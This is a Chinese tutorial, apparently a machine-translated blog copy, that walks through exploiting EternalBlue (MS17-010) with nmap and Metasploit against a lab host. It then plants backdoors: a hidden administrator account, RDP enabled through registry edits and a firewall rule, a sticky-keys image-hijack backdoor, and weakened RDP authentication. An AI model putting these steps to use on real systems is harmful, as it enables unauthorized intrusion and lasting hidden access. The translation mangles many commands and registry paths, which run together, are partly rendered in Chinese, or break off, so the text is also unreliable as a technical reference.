永恒之蓝是什么虚拟机去虚拟化教程

扫描端口：打开445端口时发现可能存在永久蓝色ms17_010 )漏洞nmap -sV -p- -A -v 192.168.206.129

打开MSF MSF控制台

搜索器search ms17_010

使用msf验证脚本验证ms17 _ 010 use auxiliary/scanner/SMB/SMB _ ms17 _ 010是否存在

显示选项

配置验证脚本set RHOSTS 192.168.206.129

运行run

表示存在ms17_010漏洞

ms17 _ 010 :使用use exploit/windows/SMB/ms17 _ 010 _外部蓝

显示选项

配置： set rhosts 192.168.206.129使用： run

命令： whoami获取系统权限

发现乱码

原因： indows和linux系统的中文代码不同

解决方法： chcp 65001

原理： CHCP是一种可以显示或设置主动代码页码的计算机指令。

65001 UTF-8代码页

950繁体中文

936简体中文默认GBK

437毫秒- dos美式英语

后门创建方法1 :创建新的隐藏管理员帐户，打开远程桌面，远程登录以创建新的隐藏用户net user shy014$ shy014 /add

向管理员组netlocalgroupadministratorsshy 014 $/add添加新用户

3389启动远程桌面服务

regaddhklm\system\current控制集\ control\terminal ‘ ‘ server/vfdenytsconnections/treg _ dword/d0/f

配置防火墙策略

netshadvfirewallfirewalladdrulename=’ remote桌面’ protocol=tcpdir=in local port=3389 action=allow

netsh是windows网络配置命令，adv防火墙防火墙意味着防火墙的高级设置。 add rule添加规则。 name指定规则名称，protocol指定协议，dir指定是出场还是入站，localport指定端口，操作指定操作allow允许

使用您创建的隐藏帐户远程登录

方法2 )无钥匙后门-图像劫持reg add ‘ hklm\software\Microsoft\windows nt\current version\imagefileeexecutionoptions

命令说明： reg add通过向注册表中添加记录，后跟注册表的位置。 需要注意的是，HKLM实际上是HKEY_LOCAL_MACHINE的缩写。 名为Image File Execution Option的目录用于设置镜像劫持。 被劫持的是命令的sethc粘性程序，用/v指定密钥名称。 此键名调试器是固定的，用/t指定类型。 也就是说，REG_SZ字符串类型，最后用/d指定密钥值

打开远程桌面

1、设置允许远程桌面连接的防火墙

netshadvfirewallfirewalladdrulename=’ remote桌面’ protocol=tcpdir=in local port=3389 action=allow

netsh是windows网络配置命令，adv防火墙防火墙意味着防火墙的高级设置。 add rule添加规则。 name指定规则名称，protocol指定协议，dir指定是出场还是入站，localport指定端口，操作指定操作allow允许

2 .打开远程桌面

reg add ‘ hklm\system\current control set\control\terminalserver ‘/vfdenytsconnections/treg _ dword/d0/f

远程桌面配置：

1，UserAuthentication将“用户验证选项”设置为0

reg add ‘ hklm\system\current control set\control\terminalserver\winstations\RDP-TCP ‘/vuserauthentication

yes本来就是0，重新写一下)

1在远程桌面连接前验证

0连接到远程桌面之前不需要进行认证。 连接到远程桌面的锁定屏幕界面后进行认证

2，将安全层设置为0

reg add ‘ hklm\system\current control set\control\terminalserver\winstations\RDP-TCP ‘/vsecuritylayer/trer

0是指在连接前使用rdp协议进行认证。 rdp是远程桌面连接，可以很容易地理解为关闭身份验证。 1是连接前在两端协商认证，这是默认值。 2是使用tls协议进行

0直接跳转到锁定屏幕的界面

1必须输入用户名才能跳转到锁定屏幕界面

考试向大人物学习：

请参阅文章：

3359 blog.csdn.net/fageweiketang/article/details/88317656